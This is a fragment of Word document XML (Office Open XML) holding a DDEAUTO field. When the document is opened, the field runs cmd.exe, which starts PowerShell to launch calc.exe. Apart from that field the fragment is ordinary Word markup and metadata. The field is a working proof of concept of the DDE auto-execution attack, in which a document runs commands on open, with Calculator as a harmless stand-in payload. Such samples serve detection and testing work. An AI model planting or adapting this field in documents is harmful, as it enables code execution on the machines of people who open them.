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D48" w:rsidRDefault="00835FC2">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00835FC2">
        <w:instrText>ddeauto "c:\\\\microsoft\\\\office\\\\word\\\\document\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\system32\\\\cmd.exe" "/c powershell.exe start-process 'calc.exe'"  \* mergeformat</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> 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  <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="0010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C2"/>
    <w:rsid w:val="00103D48"/>
    <w:rsid w:val="00775595"/>
    <w:rsid w:val="0083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DE8B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BCC380E8-73CC-4554-B7B3-3238AADC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2021-02-25T22:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-25T22:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>